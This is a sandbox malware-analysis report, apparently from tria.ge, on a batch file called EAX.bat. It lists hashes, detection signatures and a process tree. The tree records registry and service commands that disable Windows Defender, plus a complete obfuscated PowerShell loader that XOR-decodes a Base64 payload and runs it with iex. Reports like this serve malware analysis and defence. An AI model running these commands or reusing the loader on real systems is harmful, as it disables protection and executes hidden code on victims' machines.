Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
08/05/2024, 21:46
Static task
static1
Behavioral task
behavioral1
Sample
EAX.bat
Resource
win10-20240404-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
EAX.bat
Resource
win7-20240220-en
6 signatures
150 seconds
Behavioral task
behavioral3
Sample
EAX.bat
Resource
win10v2004-20240226-en
7 signatures
150 seconds
General
-
Target
EAX.bat
-
Size
13KB
-
MD5
702ac05d7d2c6fcb005d0f072e7e1dee
-
SHA1
0538b012778f133432a0778fdb540292b9f6ef94
-
SHA256
d6df7159e2798c2e3a8d65c2a15d15bd85a9d4a73d1a196ba7bebc32113b20f9
-
SHA512
e9179fc17d850c840df69a5580c016155cba2cfad099cac1b74037fb16b77156035b948f0eec1ee78c17e8153eab33135fe6ae0f6ded9813e972b7585845c796
-
SSDEEP
384:+SopGvVZz6qws74S+ngzstcpshXrDUsDul0f6dniof5+tLohTleawO6jxi5Dm3u4:Ljmq97R+kpmDUXBK8w19mm3v
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
pid Process 1748 powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1748 powershell.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 1508 wrote to memory of 2744 1508 cmd.exe 29 PID 1508 wrote to memory of 2744 1508 cmd.exe 29 PID 1508 wrote to memory of 2744 1508 cmd.exe 29 PID 2744 wrote to memory of 1588 2744 net.exe 30 PID 2744 wrote to memory of 1588 2744 net.exe 30 PID 2744 wrote to memory of 1588 2744 net.exe 30 PID 1508 wrote to memory of 3044 1508 cmd.exe 31 PID 1508 wrote to memory of 3044 1508 cmd.exe 31 PID 1508 wrote to memory of 3044 1508 cmd.exe 31 PID 1508 wrote to memory of 2972 1508 cmd.exe 32 PID 1508 wrote to memory of 2972 1508 cmd.exe 32 PID 1508 wrote to memory of 2972 1508 cmd.exe 32 PID 1508 wrote to memory of 2564 1508 cmd.exe 33 PID 1508 wrote to memory of 2564 1508 cmd.exe 33 PID 1508 wrote to memory of 2564 1508 cmd.exe 33 PID 2564 wrote to memory of 2572 2564 net.exe 34 PID 2564 wrote to memory of 2572 2564 net.exe 34 PID 2564 wrote to memory of 2572 2564 net.exe 34 PID 1508 wrote to memory of 2612 1508 cmd.exe 35 PID 1508 wrote to memory of 2612 1508 cmd.exe 35 PID 1508 wrote to memory of 2612 1508 cmd.exe 35 PID 2612 wrote to memory of 2624 2612 net.exe 36 PID 2612 wrote to memory of 2624 2612 net.exe 36 PID 2612 wrote to memory of 2624 2612 net.exe 36 PID 1508 wrote to memory of 1748 1508 cmd.exe 39 PID 1508 wrote to memory of 1748 1508 cmd.exe 39 PID 1508 wrote to memory of 1748 1508 cmd.exe 39
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\EAX.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:1588
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:3044
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2972
-
-
C:\Windows\system32\net.exenet stop WinDefend2⤵
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend3⤵PID:2572
-
-
-
C:\Windows\system32\net.exenet start WinDefend2⤵
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start WinDefend3⤵PID:2624
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoExit -encodedCommand $ h e h e h e   =   " N C c 8 M S Y 7 P T x y H j 0 9 O S c i F C c 8 M X I p X 1 h y c n J y A j M g M z 9 y e n Y / P T Y n P j c c M z 8 3 f n J 2 N C c 8 M S Y 7 P T w c M z 8 3 e 1 9 Y c n J y c n Y z I S E 3 P 3 J v c n o J E y I i F j 0 / M z s 8 D 2 h o E S c g I D c 8 J h Y 9 P z M 7 P H w V N y Y T I S E 3 P z A + O z c h e n t y L l 9 Y c n J y c g U 6 N y A 3 f x 0 w O D c x J n I p c n Y N f B U + P T A z P h M h I T c / M D 4 r E T M x O j d y f x M 8 N n J 2 D X w e P T E z J j s 9 P H w B I j 4 7 J n p 1 D g 5 1 e w l / Y w 9 8 X 1 h y c n J y c h c j J z M + I X p 1 A S s h J j c / f D Y + P n V 7 X 1 h y c n J y c i 9 7 f B U 3 J g Y r I j d 6 d R 8 7 M S A 9 I T 0 0 J n w F O z x h Y H w H P C E z N D c c M y Y 7 J D c f N y Y 6 P T Y h d X t f W H J y c n J 2 J j 8 i b x J 6 e 1 9 Y c n J y c n Y z I S E 3 P 3 w V N y Y f N y Y 6 P T Y h e n t y L n I U P S A X M z E 6 f x 0 w O D c x J n I p G z R 6 d g 1 8 H D M / N 3 J / P j s 5 N 3 J w F T d 4 A n g 9 M X g 2 N i A 3 I S F w e 3 I p d i Y / I n l v d g 0 v L 1 9 Y c n J y c i A 3 J i c g P H J 2 J j 8 i C W I P f B s 8 J D 0 5 N 3 p 2 P C c + P n 5 y E n p 6 d j M h I T c / f B U 3 J h 8 3 J j o 9 N n p 1 F T c m H z 0 2 J z 4 3 G j M 8 N j 4 3 d X t 7 f B s 8 J D 0 5 N 3 p 2 P C c + P n 5 f W B J 6 d j 8 9 N i c + N x w z P z d 7 e 3 5 y d j Q n P D E m O z 0 8 H D M / N 3 t 7 X 1 g v X 1 h f W F 9 Y N C c 8 M S Y 7 P T x y N T c m F j c + N z U z J j c G K y I 3 c i l f W H J y c n I C M y A z P 3 J 6 X 1 h y c n J y c g k C M y A z P z c m N y B 6 A j 0 h O y Y 7 P T x y b 3 J i f n I f M z w 2 M y Y 9 I C t y b 3 J 2 B i A n N 3 s P c g k G K y I 3 C Q 8 P X 1 h y c n J y c n Y 0 J z w x f n I J A j M g M z 8 3 J j c g e g I 9 I T s m O z 0 8 c m 9 y Y 3 s P c g k G K y I 3 D 3 J 2 N j c + B i s i N 3 J v c g k E P T s 2 D 1 9 Y c n J y c n t f W H J y c n J 2 J i s i N 3 J v c g k T I i I W P T 8 z O z w P a G g R J y A g N z w m F j 0 / M z s 8 f F 9 Y c n J y c h Y 3 N D s 8 N x Y r P D M / O z E T I S E 3 P z A + K 3 p 6 H D c l f x 0 w O D c x J n I B K y E m N z 9 8 A D c 0 P j c x J j s 9 P H w T I S E 3 P z A + K x w z P z d 6 d Q A 3 N D 4 3 M S Y 3 N h Y 3 P j c 1 M y Y 3 d X t 7 f l 9 Y C Q E r I S Y 3 P 3 w A N z Q + N z E m O z 0 8 f B c / O y Z 8 E y E h N z 8 w P i s Q J z s + N j c g E z E x N y E h D 2 h o A C c 8 e 3 x f W H J y c n I W N z Q 7 P D c W K z w z P z s x H z 0 2 J z 4 3 e n U b P B 8 3 P z 0 g K x 8 9 N i c + N 3 V + c n Y 0 M z 4 h N 3 t 8 X 1 h y c n J y F j c 0 O z w 3 B i s i N 3 p 1 H y s W N z 4 3 N T M m N w Y r I j d 1 f n J 1 E T 4 z I S F + c g I n M D 4 7 M X 5 y A T c z P j c 2 f n I T P C E 7 E T 4 z I S F + X 1 h y c n J y E y c m P R E + M y E h d X 5 y C Q E r I S Y 3 P 3 w f J z 4 m O z E z I S Y W N z 4 3 N T M m N w 9 7 X 1 h f W H J y d i Y r I j d 8 X 1 h y c n J y F j c 0 O z w 3 E T 0 8 I S Y g J z E m P S B 6 d Q A G A S I 3 M T s z P h w z P z d + c h o 7 N j c Q K w E 7 N X 5 y A i c w P j s x d X 5 f W A k B K y E m N z 9 8 A D c 0 P j c x J j s 9 P H w R M z 4 + O z w 1 E T 0 8 J D c 8 J j s 9 P C E P a G g B J j M 8 N j M g N n 5 y d j Q n P D F 7 f F 9 Y c n J y c n I B N y Y b P y I + N z 8 3 P C Y z J j s 9 P B Q + M z U h e n U A J z w m O z 8 3 f n I f M z w z N T c 2 d X t f W F 9 Y c n J 2 J i s i N 3 x f W H J y c n I W N z Q 7 P D c f N y Y 6 P T Z 6 d R s 8 J D 0 5 N 3 V + c n U C J z A + O z F + c h o 7 N j c Q K w E 7 N X 5 y H D c l A T 4 9 J n 5 y B D s g J i c z P n V + c n Y 2 N z 4 G K y I 3 f l 9 Y d j Q n P D F 7 f H I B N y Y b P y I + N z 8 3 P C Y z J j s 9 P B Q + M z U h e n U A J z w m O z 8 3 f n I f M z w z N T c 2 d X t f W H J y c n I g N y Y n I D x y d i Y r I j d 8 E S A 3 M y Y 3 B i s i N 3 p 7 X 1 g v X 1 h f W F 9 Y C R s 8 J g I m I A 9 2 N C c 8 M R M 2 N i B y b 3 I e P T 0 5 J y I U J z w x c j M / I T t 8 N j 4 + c h M / I T s d I j c 8 A T c h I T s 9 P F 9 Y d j 0 + N g I g P S Y 3 M S Y 7 P T w Q J z Q 0 N y B y b 3 J i X 1 h 2 J C J v C Q E r I S Y 3 P 3 w A J z w m O z 8 3 f B s 8 J j c g P S I B N y A k O z E 3 I X w f M y A h O j M + D 2 h o F T c m F j c + N z U z J j c U P S A U J z w x J j s 9 P A I 9 O z w m N y B 6 e h 4 9 P T k n I h Q n P D F y O T c g P D c + Y W B 8 N j 4 + c g Q 7 I C Y n M z 4 C I D 0 m N z E m e 3 5 y e j U 3 J h Y 3 P j c 1 M y Y 3 B i s i N 3 I S e g k b P C Y C J i A P f n I J B x s 8 J m F g D 3 5 y C Q c b P C Z h Y A 9 + c g k H G z w m Y W A P f B 8 z O T c Q K w A 3 N A Y r I j d 6 e 3 t y e g k Q P T 0 + D 3 t 7 e 1 9 Y d i Q i f B s 8 J D 0 5 N 3 p 2 N C c 8 M R M 2 N i B + c m F + c m I q Z m J + c g k g N z Q P d j 0 + N g I g P S Y 3 M S Y 7 P T w Q J z Q 0 N y B 7 X 1 h 2 M C c 0 c m 9 y C R A r J j c J D w 9 y e m I q Z m p + Y i p h Y 3 5 i K j F r e 1 9 Y C Q E r I S Y 3 P 3 w A J z w m O z 8 3 f B s 8 J j c g P S I B N y A k O z E 3 I X w f M y A h O j M + D 2 h o E T 0 i K 3 p 2 M C c 0 f n J i f n J 2 N C c 8 M R M 2 N i B + c m F 7 X 1 g l N T c m c n A 6 J i Y i I W h 9 f T R m Z z E x N m N m f z E 2 Y T R / Z m V m M 3 9 q a m s 3 f z Y 3 Y z N i a 2 B n M W R h Y n 9 i Y n 8 5 I m U j M y U z M D 0 h J T N 8 I D s 5 N y B 8 I D c i P j s m f D Y 3 J H 0 A N z U 7 I S Y g M y Y 7 P T x 8 N y o 3 f n B y f x 1 y c B F o D g c h N y A h D n Y 3 P C R o B w E X A B w T H x c O E y I i F j M m M w 4 e P T E z P g 4 G N z 8 i D g A 3 N T s h J i A z J j s 9 P H w 3 K j d w X 1 g B J j M g J n 8 C I D 0 x N y E h c n 8 U O z 4 3 A j M m O n J w E W g O B y E 3 I C E O d j c 8 J G g H A R c A H B M f F w 4 T I i I W M y Y z D h 4 9 M T M + D g Y 3 P y I O A D c 1 O y E m I D M m O z 0 8 f D c q N 3 B y "  
 $ X o r _ V a l   =   8 2  
 $ x r   =   [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ h e h e h e )  
 $ f a f a f   =   $ x r   |   F o r E a c h - O b j e c t   {   r e t u r n   $ _   - b x o r   $ X o r _ V a l   }  
 $ d e c s c r   =   [ t e x t . e n c o d i n g ] : : u t f 8 . G e t S t r i n g ( $ f a f a f )  
 i e x   $ d e c s c r  
 2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1748
-